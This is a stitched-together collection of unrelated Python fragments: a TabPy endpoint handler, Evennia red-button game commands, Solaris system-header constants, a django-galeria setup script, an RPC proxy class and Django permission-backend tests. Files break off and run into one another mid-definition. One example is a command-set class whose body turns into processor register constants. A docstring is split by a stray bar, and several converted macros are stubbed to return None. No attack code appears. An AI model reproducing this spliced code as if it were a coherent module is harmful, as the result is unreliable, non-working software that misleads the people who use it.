"""
HTTP handler to serve specific endpoint requests like
http://myserver:9004/endpoints/mymodel
For how generic endpoint requests are served, look
at endpoints_handler.py
"""
import json
import logging
import shutil
from tabpy.tabpy_server.common.util import format_exception
from tabpy.tabpy_server.handlers import ManagementHandler
from tabpy.tabpy_server.handlers.base_handler import STAGING_THREAD
from tabpy.tabpy_server.management.state import get_query_object_path
from tabpy.tabpy_server.psws.callbacks import on_state_change
from tabpy.tabpy_server.handlers.util import AuthErrorStates
from tornado import gen
class EndpointHandler(ManagementHandler):
def initialize(self, app):
super(EndpointHandler, self).initialize(app)
def get(self, endpoint_name):
if self.should_fail_with_auth_error() != AuthErrorStates.NONE:
self.fail_with_auth_error()
return
self.logger.log(logging.DEBUG, f"Processing GET for /endpoints/{endpoint_name}")
self._add_CORS_header()
if not endpoint_name:
self.write(json.dumps(self.tabpy_state.get_endpoints()))
else:
if endpoint_name in self.tabpy_state.get_endpoints():
self.write(json.dumps(self.tabpy_state.get_endpoints()[endpoint_name]))
else:
self.error_out(
404,
"Unknown endpoint",
info=f"Endpoint {endpoint_name} is not found",
)
@gen.coroutine
def put(self, name):
if self.should_fail_with_auth_error() != AuthErrorStates.NONE:
self.fail_with_auth_error()
return
self.logger.log(logging.DEBUG, f"Processing PUT for /endpoints/{name}")
try:
if not self.request.body:
self.error_out(400, "Input body cannot be empty")
self.finish()
return
try:
request_data = json.loads(self.request.body.decode("utf-8"))
except BaseException as ex:
self.error_out(
400, log_message="Failed to decode input body", info=str(ex)
)
self.finish()
return
# check if endpoint exists
endpoints = self.tabpy_state.get_endpoints(name)
if len(endpoints) == 0:
self.error_out(404, f"endpoint {name} does not exist.")
self.finish()
return
new_version = int(endpoints[name]["version"]) + 1
self.logger.log(logging.INFO, f"Endpoint info: {request_data}")
err_msg = yield self._add_or_update_endpoint(
"update", name, new_version, request_data
)
if err_msg:
self.error_out(400, err_msg)
self.finish()
else:
self.write(self.tabpy_state.get_endpoints(name))
self.finish()
except Exception as e:
err_msg = format_exception(e, "update_endpoint")
self.error_out(500, err_msg)
self.finish()
@gen.coroutine
def delete(self, name):
if self.should_fail_with_auth_error() != AuthErrorStates.NONE:
self.fail_with_auth_error()
return
self.logger.log(logging.DEBUG, f"Processing DELETE for /endpoints/{name}")
try:
endpoints = self.tabpy_state.get_endpoints(name)
if len(endpoints) == 0:
self.error_out(404, f"endpoint {name} does not exist.")
self.finish()
return
# update state
try:
endpoint_info = self.tabpy_state.delete_endpoint(name)
except Exception as e:
self.error_out(400, f"Error when removing endpoint: {e.message}")
self.finish()
return
# delete files
if endpoint_info["type"] != "alias":
delete_path = get_query_object_path(
self.settings["state_file_path"], name, None
)
try:
yield self._delete_po_future(delete_path)
except Exception as e:
self.error_out(400, f"Error while deleting: {e}")
self.finish()
return
self.set_status(204)
self.finish()
except Exception as e:
err_msg = format_exception(e, "delete endpoint")
self.error_out(500, err_msg)
self.finish()
on_state_change(
self.settings, self.tabpy_state, self.python_service, self.logger
)
@gen.coroutine
def _delete_po_future(self, delete_path):
future = STAGING_THREAD.submit(shutil.rmtree, delete_path)
ret = yield future
raise gen.Return(ret)
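# A minimal client-side sketch for exercising the GET handler above
# (assumptions: a TabPy server listening on localhost:9004 and a deployed
# endpoint named "mymodel" -- both hypothetical). Standard library only.
if __name__ == "__main__":
    from urllib.error import HTTPError
    from urllib.request import urlopen
    try:
        # GET /endpoints/<name> returns the endpoint's metadata as JSON.
        with urlopen("http://localhost:9004/endpoints/mymodel") as resp:
            print(json.loads(resp.read().decode("utf-8")))
    except HTTPError as err:
        # The handler answers 404 for unknown endpoint names.
        print("server answered", err.code)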
the red_button. Here we have defined
the commands and the cmdset in the same module, but if you
have many different commands to merge it is often better
to define the cmdset separately, picking and choosing from
among the available commands as to what should be included in the
cmdset - this way you can often re-use the commands too.
"""
import random
from evennia import Command, CmdSet
# Some simple commands for the red button
# ------------------------------------------------------------
# Commands defined on the red button
# ------------------------------------------------------------
class CmdNudge(Command):
"""
Try to nudge the button's lid
Usage:
nudge lid
This command will have you try to
push the lid of the button away.
"""
key = "nudge lid" # two-word command name!
aliases = ["nudge"]
locks = "cmd:all()"
def func(self):
"""
nudge the lid. Random chance of success to open it.
"""
rand = random.random()
if rand < 0.5:
self.caller.msg("You nudge at the lid. It seems stuck.")
elif rand < 0.7:
self.caller.msg("You move the lid back and forth. It won't budge.")
else:
self.caller.msg("You manage to get a nail under the lid.")
self.caller.execute_cmd("open lid")
class CmdPush(Command):
"""
Push the red button
Usage:
push button
"""
key = "push button"
aliases = ["push", "press button", "press"]
locks = "cmd:all()"
def func(self):
"""
Note that we choose to implement this with checking for
if the lid is open/closed. This is because this command
is likely to be tried regardless of the state of the lid.
An alternative would be to make two versions of this command
and tuck them into the cmdset linked to the Open and Closed
lid-state respectively.
"""
if self.obj.db.lid_open:
string = "You reach out to press the big red button ..."
string += "\n\nA BOOM! A bright light blinds you!"
string += "\nThe world goes dark ..."
self.caller.msg(string)
self.caller.location.msg_contents(
"%s presses the button. BOOM! %s is blinded by a flash!"
% (self.caller.name, self.caller.name),
exclude=self.caller,
)
# the button's method will handle all setup of scripts etc.
self.obj.press_button(self.caller)
else:
string = "You cannot push the button - there is a glass lid covering it."
self.caller.msg(string)
class CmdSmashGlass(Command):
"""
smash glass
Usage:
smash glass
Try to smash the glass of the button.
"""
key = "smash glass"
aliases = ["smash lid", "break lid", "smash"]
locks = "cmd:all()"
def func(self):
"""
The lid won't open, but there is a small chance
of causing the lamp to break.
"""
rand = random.random()
if rand < 0.2:
string = "You smash your hand against the glass"
string += " with all your might. The lid won't budge"
string += " but you cause quite the tremor through the button's mount."
string += "\nIt looks like the button's lamp stopped working for the time being."
self.obj.lamp_works = False
elif rand < 0.6:
string = "You hit the lid hard. It doesn't move an inch."
else:
string = "You place a well-aimed fist against the glass of the lid."
string += " Unfortunately all you get is a pain in your hand. Maybe"
string += " you should just try to open the lid instead?"
self.caller.msg(string)
self.caller.location.msg_contents(
"%s tries to smash the glass of the button." % (self.caller.name), exclude=self.caller
)
class CmdOpenLid(Command):
"""
open lid
Usage:
open lid
"""
key = "open lid"
aliases = ["open button", "open"]
locks = "cmd:all()"
def func(self):
"simply call the right function."
if self.obj.db.lid_locked:
self.caller.msg("This lid seems locked in place for the moment.")
return
string = "\nA ticking sound is heard, like a winding mechanism. Seems "
string += "the lid will soon close again."
self.caller.msg(string)
self.caller.location.msg_contents(
"%s opens the lid of the button." % (self.caller.name), exclude=self.caller
)
# add the relevant cmdsets to button
self.obj.cmdset.add(LidClosedCmdSet)
# call object method
self.obj.open_lid()
class CmdCloseLid(Command):
"""
close the lid
Usage:
close lid
Closes the lid of the red button.
"""
key = "close lid"
aliases = ["close"]
locks = "cmd:all()"
def func(self):
"Close the lid"
self.obj.close_lid()
# this will clean out scripts dependent on lid being open.
self.caller.msg("You close the button's lid. It clicks back into place.")
self.caller.location.msg_contents(
"%s closes the button's lid." % (self.caller.name), exclude=self.caller
)
class CmdBlindLook(Command):
"""
Looking around in darkness
Usage:
look <obj>
... not that there's much to see in the dark.
"""
key = "look"
aliases = ["l", "get", "examine", "ex", "feel", "listen"]
locks = "cmd:all()"
def func(self):
"This replaces all the senses when blinded."
# we decide what to reply based on which command was
# actually tried
if self.cmdstring == "get":
string = "You fumble around blindly without finding anything."
elif self.cmdstring == "examine":
string = "You try to examine your surroundings, but can't see a thing."
elif self.cmdstring == "listen":
string = "You are deafened by the boom."
elif self.cmdstring == "feel":
string = "You fumble around, hands outstretched. You bump your knee."
else:
# trying to look
string = "You are temporarily blinded by the flash. "
string += "Until it wears off, all you can do is feel around blindly."
self.caller.msg(string)
self.caller.location.msg_contents(
"%s stumbles around, blinded." % (self.caller.name), exclude=self.caller
)
class CmdBlindHelp(Command):
"""
Help function while in the blinded state
Usage:
help
"""
key = "help"
aliases = "h"
locks = "cmd:all()"
def func(self):
"Give a message."
self.caller.msg("You are beyond help ... until you can see again.")
# ---------------------------------------------------------------
# Command sets for the red button
# ---------------------------------------------------------------
# We next tuck these commands into their respective command sets.
# (note that we are overdoing the cmdset separation a bit here
# to show how it works).
class DefaultCmdSet(CmdSet):
"""
The default cmdset always sits
on the button object and whereas other
command sets may be added/merged onto it
and hide it, removing them will always
bring it back. It's added to the object
using obj.cmdset.add_default().
"""
key = "RedButtonDefault"
mergetype = "Union" # this is default, we don't really need to put it here.
def at_cmdset_creation(self):
"Init the cmdset"
self.add(CmdPush())
class LidClosedCmdSet(CmdSet):
"""
A simple cmdset tied to the redbutton object.
It contains the commands that launches the other
command sets, making the red button a self-contained
item (i.e. you don't have to manually add any
scripts etc to it when creating it).
"""
key = "LidClosedCmdSet"
# default Union is used *except* if we are adding to a
# cmdset named LidOpenCmdSet - this one we replace
# completely.
PSR_EF = 0x00001000
PSR_EC = 0x00002000
PSR_RSV = 0x000FC000
PSR_ICC = 0x00F00000
PSR_C = 0x00100000
PSR_V = 0x00200000
PSR_Z = 0x00400000
PSR_N = 0x00800000
PSR_VER = 0x0F000000
PSR_IMPL = 0xF0000000
PSL_ALLCC = PSR_ICC
PSL_USER = (PSR_S)
PSL_USERMASK = (PSR_ICC)
PSL_UBITS = (PSR_ICC|PSR_EF)
def USERMODE(ps): return (((ps) & PSR_PS) == 0)
# Included from sys/fsr.h
FSR_CEXC = 0x0000001f
FSR_AEXC = 0x000003e0
FSR_FCC = 0x00000c00
FSR_PR = 0x00001000
FSR_QNE = 0x00002000
FSR_FTT = 0x0001c000
FSR_VER = 0x000e0000
FSR_TEM = 0x0f800000
FSR_RP = 0x30000000
FSR_RD = 0xc0000000
FSR_VER_SHIFT = 17
FSR_FCC1 = 0x00000003
FSR_FCC2 = 0x0000000C
FSR_FCC3 = 0x00000030
FSR_CEXC_NX = 0x00000001
FSR_CEXC_DZ = 0x00000002
FSR_CEXC_UF = 0x00000004
FSR_CEXC_OF = 0x00000008
FSR_CEXC_NV = 0x00000010
FSR_AEXC_NX = (0x1 << 5)
FSR_AEXC_DZ = (0x2 << 5)
FSR_AEXC_UF = (0x4 << 5)
FSR_AEXC_OF = (0x8 << 5)
FSR_AEXC_NV = (0x10 << 5)
FTT_NONE = 0
FTT_IEEE = 1
FTT_UNFIN = 2
FTT_UNIMP = 3
FTT_SEQ = 4
FTT_ALIGN = 5
FTT_DFAULT = 6
FSR_FTT_SHIFT = 14
FSR_FTT_IEEE = (FTT_IEEE << FSR_FTT_SHIFT)
FSR_FTT_UNFIN = (FTT_UNFIN << FSR_FTT_SHIFT)
FSR_FTT_UNIMP = (FTT_UNIMP << FSR_FTT_SHIFT)
FSR_FTT_SEQ = (FTT_SEQ << FSR_FTT_SHIFT)
FSR_FTT_ALIGN = (FTT_ALIGN << FSR_FTT_SHIFT)
FSR_FTT_DFAULT = (FTT_DFAULT << FSR_FTT_SHIFT)
FSR_TEM_NX = (0x1 << 23)
FSR_TEM_DZ = (0x2 << 23)
FSR_TEM_UF = (0x4 << 23)
FSR_TEM_OF = (0x8 << 23)
FSR_TEM_NV = (0x10 << 23)
RP_DBLEXT = 0
RP_SINGLE = 1
RP_DOUBLE = 2
RP_RESERVED = 3
RD_NEAR = 0
RD_ZER0 = 1
RD_POSINF = 2
RD_NEGINF = 3
FPRS_DL = 0x1
FPRS_DU = 0x2
FPRS_FEF = 0x4
PIL_MAX = 0xf
# h2py left these C macro bodies untranslated (they expand to assembly);
# they are stubbed out here so the module parses.
def SAVE_GLOBALS(RP): return None
def RESTORE_GLOBALS(RP): return None
def SAVE_OUTS(RP): return None
def RESTORE_OUTS(RP): return None
def SAVE_WINDOW(SBP): return None
def RESTORE_WINDOW(SBP): return None
def STORE_FPREGS(FP): return None
def LOAD_FPREGS(FP): return None
_SPARC_MAXREGWINDOW = 31
_XRS_ID = 0x78727300
GETCONTEXT = 0
SETCONTEXT = 1
UC_SIGMASK = 001
UC_STACK = 002
UC_CPU = 004
UC_MAU = 010
UC_FPU = UC_MAU
UC_INTR = 020
UC_ASR = 040
UC_MCONTEXT = (UC_CPU|UC_FPU|UC_ASR)
UC_ALL = (UC_SIGMASK|UC_STACK|UC_MCONTEXT)
_SIGQUEUE_MAX = 32
_SIGNOTIFY_MAX = 32
# Included from sys/pcb.h
INSTR_VALID = 0x02
NORMAL_STEP = 0x04
WATCH_STEP = 0x08
CPC_OVERFLOW = 0x10
ASYNC_HWERR = 0x20
STEP_NONE = 0
STEP_REQUESTED = 1
STEP_ACTIVE = 2
STEP_WASACTIVE = 3
# Included from sys/msacct.h
LMS_USER = 0
LMS_SYSTEM = 1
LMS_TRAP = 2
LMS_TFAULT = 3
LMS_DFAULT = 4
LMS_KFAULT = 5
LMS_USER_LOCK = 6
LMS_SLEEP = 7
LMS_WAIT_CPU = 8
LMS_STOPPED = 9
NMSTATES = 10
# Included from sys/lwp.h
# Included from sys/synch.h
from TYPES import *
USYNC_THREAD = 0x00
USYNC_PROCESS = 0x01
LOCK_NORMAL = 0x00
LOCK_ERRORCHECK = 0x02
LOCK_RECURSIVE = 0x04
USYNC_PROCESS_ROBUST = 0x08
LOCK_PRIO_NONE = 0x00
LOCK_PRIO_INHERIT = 0x10
LOCK_PRIO_PROTECT = 0x20
LOCK_STALL_NP = 0x00
LOCK_ROBUST_NP = 0x40
LOCK_OWNERDEAD = 0x1
LOCK_NOTRECOVERABLE = 0x2
LOCK_INITED = 0x4
LOCK_UNMAPPED = 0x8
LWP_DETACHED = 0x00000040
LWP_SUSPENDED = 0x00000080
__LWP_ASLWP = 0x00000100
MAXSYSARGS = 8
NORMALRETURN = 0
JUSTRETURN = 1
LWP_USER = 0x01
LWP_SYS = 0x02
TS_FREE = 0x00
TS_SLEEP = 0x01
TS_RUN = 0x02
TS_ONPROC = 0x04
TS_ZOMB = 0x08
TS_STOPPED = 0x10
T_INTR_THREAD = 0x0001
T_WAKEABLE = 0x0002
T_TOMASK = 0x0004
T_TALLOCSTK = 0x0008
T_WOULDBLOCK = 0x0020
T_DONTBLOCK = 0x0040
T_DONTPEND = 0x0080
T_SYS_PROF = 0x0100
T_WAITCVSEM = 0x0200
T_WATCHPT = 0x0400
T_PANIC = 0x0800
TP_HOLDLWP = 0x0002
TP_TWAIT = 0x0004
TP_LWPEXIT = 0x0008
TP_PRSTOP = 0x0010
TP_CHKPT = 0x0020
TP_EXITLWP = 0x0040
TP_PRVSTOP = 0x0080
TP_MSACCT = 0x0100
TP_STOPPING = 0x0200
TP_WATCHPT = 0x0400
TP_PAUSE = 0x0800
TP_CHANGEBIND = 0x1000
TS_LOAD = 0x0001
TS_DONT_SWAP = 0x0002
TS_SWAPENQ = 0x0004
TS_ON_SWAPQ = 0x0008
TS_CSTART = 0x0100
TS_UNPAUSE = 0x0200
TS_XSTART = 0x0400
TS_PSTART = 0x0800
TS_RESUME = 0x1000
TS_CREATE = 0x2000
TS_ALLSTART = \
(TS_CSTART|TS_UNPAUSE|TS_XSTART|TS_PSTART|TS_RESUME|TS_CREATE)
def CPR_VSTOPPED(t): return None  # untranslated C macro body
def THREAD_TRANSITION(tp): return thread_transition(tp);
def THREAD_STOP(tp): return None  # untranslated C macro body
def THREAD_ZOMB(tp): return THREAD_SET_STATE(tp, TS_ZOMB, NULL)
def SEMA_HELD(x): return (sema_held((x)))
NO_LOCKS_HELD = 1
NO_COMPETING_THREADS = 1
# Included from sys/cred.h
# Included from sys/uio.h
from TYPES import *
# Included from sys/resource.h
from TYPES import *
PRIO_PROCESS = 0
PRIO_PGRP = 1
PRIO_USER = 2
RLIMIT_CPU = 0
RLIMIT_FSIZE = 1
RLIMIT_DATA = 2
RLIMIT_STACK = 3
RLIMIT_CORE = 4
RLIMIT_NOFILE = 5
RLIMIT_VMEM = 6
RLIMIT_AS = RLIMIT_VMEM
RLIM_NLIMITS = 7
RLIM_INFINITY = (-3l)
RLIM_SAVED_MAX = (-2l)
RLIM_SAVED_CUR = (-1l)
RLIM_INFINITY = 0x7fffffff
RLIM_SAVED_MAX = 0x7ffffffe
RLIM_SAVED_CUR = 0x7ffffffd
RLIM32_INFINITY = 0x7fffffff
RLIM32_SAVED_MAX = 0x7ffffffe
RLIM32_SAVED_CUR = 0x7ffffffd
# Included from sys/model.h
# Included from sys/debug.h
def ASSERT64(x): return ASSERT(x)
def ASSERT32(x): return ASSERT(x)
DATAMODEL_MASK = 0x0FF00000
DATAMODEL_ILP32 = 0x00100000
DATAMODEL_LP64 = 0x00200000
DATAMODEL_NONE = 0
DATAMODEL_NATIVE = DATAMODEL_LP64
DATAMODEL_NATIVE = DATAMODEL_ILP32
# h2py left these model-dependent C macros untranslated (C sizeof/deref has
# no Python equivalent); they are stubbed so the module parses, with the
# original C expressions kept in comments.
def STRUCT_SIZE(handle): return None
def STRUCT_BUF(handle): return ((handle).ptr.m64)
def SIZEOF_PTR(umodel): return None
def STRUCT_SIZE(handle): return None  # C: sizeof (*(handle).ptr)
def STRUCT_BUF(handle): return ((handle).ptr)
def SIZEOF_PTR(umodel): return None   # C: sizeof (caddr_t)
def lwp_getdatamodel(t): return DATAMODEL_ILP32
RUSAGE_SELF = 0
RUSAGE_CHILDREN = -1
# Included from vm/seg_enum.h
# Included from sys/buf.h
# Included from sys/kstat.h
from TYPES import *
KSTAT_STRLEN = 31
def KSTAT_ENTER(k): return None  # untranslated C macro body
def KSTAT_EXIT(k): return None   # untranslated C macro body
KSTAT_TYPE_RAW = 0
KSTAT_TYPE_NAMED = 1
KSTAT_TYPE_INTR = 2
KSTAT_TYPE_IO = 3
KSTAT_TYPE_TIMER = 4
KSTAT_NUM_TYPES = 5
KSTAT_FLAG_VIRTUAL = 0x01
KSTAT_FLAG_VAR_SIZE = 0x02
KSTAT_FLAG_WRITABLE = 0x04
KSTAT_FLAG_PERSISTENT = 0x08
KSTAT_FLAG_DORMANT = 0x10
KSTAT_FLAG_INVALID = 0x20
KSTAT_READ = 0
KSTAT_WRITE = 1
KSTAT_DATA_CHAR = 0
KSTAT_DATA_INT32 = 1
KSTAT_DATA_UINT32 = 2
KSTAT_DATA_INT64 = 3
KSTAT_DATA_UINT64 = 4
KSTAT_DATA_LONG = KSTAT_DATA_INT32
KSTAT_DATA_ULONG = KSTAT_DATA_UINT32
KSTAT_DATA_LONG = KSTAT_DATA_INT64
KSTAT_DATA_ULONG = KSTAT_DATA_UINT64
KSTAT_DATA_LONG = 7
KSTAT_DATA_ULONG = 8
KSTAT_DATA_LONGLONG = KSTAT_DATA_INT64
KSTAT_DATA_ULONGLONG = KSTAT_DATA_UINT64
KSTAT_DATA_FLOAT = 5
KSTAT_DATA_DOUBLE = 6
KSTAT_INTR_HARD = 0
KSTAT_INTR_SOFT = 1
KSTAT_INTR_WATCHDOG = 2
KSTAT_INTR_SPURIOUS = 3
KSTAT_INTR_MULTSVC = 4
KSTAT_NUM_INTRS = 5
B_BUSY = 0x0001
B_DONE = 0x0002
B_ERROR = 0x0004
B_PAGEIO = 0x0010
B_PHYS = 0x0020
B_READ = 0x0040
B_WRITE = 0x0100
B_KERNBUF = 0x0008
B_WANTED = 0x0080
B_AGE = 0x000200
B_ASYNC = 0x000400
B_DELWRI = 0x000800
B_STALE = 0x001000
B_DONTNEED = 0x002000
B_REMAPPED = 0x004000
B_FREE = 0x008000
B_INVAL = 0x010000
B_FORCE = 0x020000
B_HEAD = 0x040000
B_NOCACHE = 0x080000
B_TRUNC = 0x100000
B_SHADOW = 0x200000
B_RETRYWRI = 0x400000
def notavail(bp): return None  # untranslated C macro body
def BWRITE(bp): return None    # untranslated C macro body
def BWRITE2(bp): return None   # untranslated C macro body
VROOT = 0x01
VNOCACHE = 0x02
VNOMAP = 0x04
VDUP = 0x08
VNOSWAP = 0x10
VNOMOUNT = 0x20
VISSWAP = 0x40
VSWAPLIKE = 0x80
VVFSLOCK = 0x100
VVFSWAIT = 0x200
VVMLOCK = 0x400
VDIROPEN = 0x800
VVMEXEC = 0x1000
VPXFS = 0x2000
AT_TYPE = 0x0001
AT_MODE = 0x0002
AT_UID = 0x0004
AT_GID = 0x0008
AT_FSID = 0x0010
AT_NODEID = 0x0020
AT_NLINK = 0x0040
AT_SIZE = 0x0080
AT_ATIME = 0x0100
AT_MTIME = 0x0200
AT_CTIME = 0x0400
AT_RDEV = 0x0800
AT_BLKSIZE = 0x1000
AT_NBLOCKS = 0x2000
AT_VCODE = 0x4000
AT_ALL = (AT_TYPE|AT_MODE|AT_UID|AT_GID|AT_FSID|AT_NODEID|\
AT_NLINK|AT_SIZE|AT_ATIME|AT_MTIME|AT_CTIME|\
AT_RDEV|AT_BLKSIZE|AT_NBLOCKS|AT_VCODE)
AT_STAT = (AT_MODE|AT_UID|AT_GID|AT_FSID|AT_NODEID|AT_NLINK|\
AT_SIZE|AT_ATIME|AT_MTIME|AT_CTIME|AT_RDEV)
AT_TIMES = (AT_ATIME|AT_MTIME|AT_CTIME)
AT_NOSET = (AT_NLINK|AT_RDEV|AT_FSID|AT_NODEID|AT_TYPE|\
AT_BLKSIZE|AT_NBLOCKS|AT_VCODE)
VSUID = 04000
VSGID = 02000
VSVTX = 01000
VREAD = 00400
VWRITE = 00200
VEXEC = 00100
MODEMASK = 07777
PERMMASK = 00777
def MANDMODE(mode): return (((mode) & (VSGID|(VEXEC>>3))) == VSGID)
VSA_ACL = 0x0001
VSA_ACLCNT = 0x0002
VSA_DFACL = 0x0004
VSA_DFACLCNT = 0x0008
# from test_plus.test import TestCase
#
#
# class TestUser(TestCase):
#
# def setUp(self):
# self.user = self.make_user()
#
# def test__str__(self):
# self.assertEqual(
# self.user.__str__(),
# 'testuser' # This is the default username for self.make_user()
# )
#
# def test_get_absolute_url(self):
# self.assertEqual(
# self.user.get_absolute_url(),
# '/users/testuser/'
# )
#!/usr/bin/env python
import codecs
import os
import sys
from setuptools import setup, find_packages
if 'publish' in sys.argv:
os.system('python setup.py sdist upload')
sys.exit()
read = lambda filepath: codecs.open(filepath, 'r', 'utf-8').read()
# Dynamically calculate the version based on galeria.VERSION.
version = __import__('galeria').get_version()
setup(
name='django-galeria',
version=version,
description='Pluggable gallery/portfolio application for Django projects',
long_description=read(os.path.join(os.path.dirname(__file__), 'README.rst')),
author='Guilherme Gondim',
author_email='semente+django-galeria@taurinus.org',
maintainer='Guilherme Gondim',
maintainer_email='semente+django-galeria@taurinus.org',
license='BSD License',
url='https://bitbucket.org/semente/django-galeria/',
packages=find_packages(),
zip_safe=False,
include_package_data=True,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
],
install_requires=['django-mptt']
)
side of an
rpc API.
"""
# The default namespace, which can be overridden in a subclass.
RPC_API_NAMESPACE = None
def __init__(self, topic, default_version, version_cap=None,
serializer=None):
"""Initialize an RpcProxy.
:param topic: The topic to use for all messages.
:param default_version: The default API version to request in all
outgoing messages. This can be overridden on a per-message
basis.
:param version_cap: Optionally cap the maximum version used for sent
messages.
:param serializer: Optionally (de-)serialize entities with a
provided helper.
"""
self.topic = topic
self.default_version = default_version
self.version_cap = version_cap
if serializer is None:
serializer = rpc_serializer.NoOpSerializer()
self.serializer = serializer
super(RpcProxy, self).__init__()
def _set_version(self, msg, vers):
"""Helper m | ethod to set the version in a message.
:param msg: The message having a version added to it.
:param vers: The version number to add to the message.
"""
v = vers if vers else self.default_version
if (self.version_cap and not
rpc_common.version_is_compatible(self.version_cap, v)):
raise rpc_common.RpcVersionCapError(version_cap=self.version_cap)
msg['version'] = v
def _get_topic(self, topic):
"""Return the topic to use for a message."""
return topic if topic else self.topic
def can_send_version(self, version):
"""Check to see if a version is compatible with the version cap."""
return (not self.version_cap or
rpc_common.version_is_compatible(self.version_cap, version))
@staticmethod
def make_namespaced_msg(method, namespace, **kwargs):
return {'method': method, 'namespace': namespace, 'args': kwargs}
def make_msg(self, method, **kwargs):
return self.make_namespaced_msg(method, self.RPC_API_NAMESPACE,
**kwargs)
def _serialize_msg_args(self, context, kwargs):
"""Helper method called to serialize message arguments.
This calls our serializer on each argument, returning a new
set of args that have been serialized.
:param context: The request context
:param kwargs: The arguments to serialize
:returns: A new set of serialized arguments
"""
new_kwargs = dict()
for argname, arg in kwargs.iteritems():
new_kwargs[argname] = self.serializer.serialize_entity(context,
arg)
return new_kwargs
def call(self, context, msg, topic=None, version=None, timeout=None):
"""rpc.call() a remote method.
:param context: The request context
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:param timeout: (Optional) A timeout to use when waiting for the
response. If no timeout is specified, a default timeout will be
used that is usually sufficient.
:returns: The return value from the remote method.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
real_topic = self._get_topic(topic)
try:
result = rpc.call(context, real_topic, msg, timeout)
return self.serializer.deserialize_entity(context, result)
except rpc.common.Timeout as exc:
raise rpc.common.Timeout(
exc.info, real_topic, msg.get('method'))
def multicall(self, context, msg, topic=None, version=None, timeout=None):
"""rpc.multicall() a remote method.
:param context: The request context
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:param timeout: (Optional) A timeout to use when waiting for the
response. If no timeout is specified, a default timeout will be
used that is usually sufficient.
:returns: An iterator that lets you process each of the returned values
from the remote method as they arrive.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
real_topic = self._get_topic(topic)
try:
result = rpc.multicall(context, real_topic, msg, timeout)
return self.serializer.deserialize_entity(context, result)
except rpc.common.Timeout as exc:
raise rpc.common.Timeout(
exc.info, real_topic, msg.get('method'))
def cast(self, context, msg, topic=None, version=None):
"""rpc.cast() a remote method.
:param context: The request context
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:returns: None. rpc.cast() does not wait on any return value from the
remote method.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
rpc.cast(context, self._get_topic(topic), msg)
def fanout_cast(self, context, msg, topic=None, version=None):
"""rpc.fanout_cast() a remote method.
:param context: The request context
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:returns: None. rpc.fanout_cast() does not wait on any return value
from the remote method.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
rpc.fanout_cast(context, self._get_topic(topic), msg)
def cast_to_server(self, context, server_params, msg, topic=None,
version=None):
"""rpc.cast_to_server() a remote method.
:param context: The request context
:param server_params: Server parameters. See rpc.cast_to_server() for
details.
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:returns: None. rpc.cast_to_server() does not wait on any
return values.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
rpc.cast_to_server(context, server_params, self._get_topic(topic), msg)
def fanout_cast_to_server(self, context, server_params, msg, topic=None,
version=None):
"""rpc.fanout_cast_to_server() a remote method.
:param context: The request context
:param server_params: Server parameters. See rpc.cast_to_server() for
details.
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:returns: None. rpc.fanout_cast_to_server() does not wait on any
return values.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
rpc.fanout_cast_to_server(context, server_params,
                          self._get_topic(topic), msg)
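# A minimal usage sketch of the proxy above (assumptions: the rpc backend is
# configured; the "compute" topic and the ping method are hypothetical):
#
#   class ComputeAPI(RpcProxy):
#       RPC_API_NAMESPACE = 'compute'
#
#       def ping(self, context, arg):
#           # make_msg() stamps the namespace; call() adds the version.
#           return self.call(context, self.make_msg('ping', arg=arg))
#
#   api = ComputeAPI(topic='compute', default_version='1.0')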
def has_module_perms(self, user, app_label):
if not user.is_anonymous() and not user.is_active:
return False
return app_label == "app1"
def get_all_permissions(self, user, obj=None):
if not obj:
return [] # We only support row level perms
if not isinstance(obj, TestObj):
return ['none']
if user.is_anonymous():
return ['anon']
if user.username == 'test2':
return ['simple', 'advanced']
else:
return ['simple']
def get_group_permissions(self, user, obj=None):
if not obj:
return # We only support row level perms
if not isinstance(obj, TestObj):
return ['none']
if 'test_group' in [group.name for group in user.groups.all()]:
return ['group_perm']
else:
return ['none']
@modify_settings(AUTHENTICATION_BACKENDS={
'append': 'auth_tests.test_auth_backends.SimpleRowlevelBackend',
})
class RowlevelBackendTest(TestCase):
"""
Tests for auth backend that supports object level permissions
"""
def setUp(self):
self.user1 = User.objects.create_user('test', 'test@example.com', 'test')
self.user2 = User.objects.create_user('test2', 'test2@example.com', 'test')
self.user3 = User.objects.create_user('test3', 'test3@example.com', 'test')
def tearDown(self):
# The get_group_permissions test messes with ContentTypes, which will
# be cached; flush the cache to ensure there are no side effects
# Refs #14975, #14925
ContentType.objects.clear_cache()
def test_has_perm(self):
self.assertEqual(self.user1.has_perm('perm', TestObj()), False)
self.assertEqual(self.user2.has_perm('perm', TestObj()), True)
self.assertEqual(self.user2.has_perm('perm'), False)
self.assertEqual(self.user2.has_perms(['simple', 'advanced'], TestObj()), True)
self.assertEqual(self.user3.has_perm('perm', TestObj()), False)
self.assertEqual(self.user3.has_perm('anon', TestObj()), False)
self.assertEqual(self.user3.has_perms(['simple', 'advanced'], TestObj()), False)
def test_get_all_permissions(self):
self.assertEqual(self.user1.get_all_permissions(TestObj()), {'simple'})
self.assertEqual(self.user2.get_all_permissions(TestObj()), {'simple', 'advanced'})
self.assertEqual(self.user2.get_all_permissions(), set())
def test_get_group_permissions(self):
group = Group.objects.create(name='test_group')
self.user3.groups.add(group)
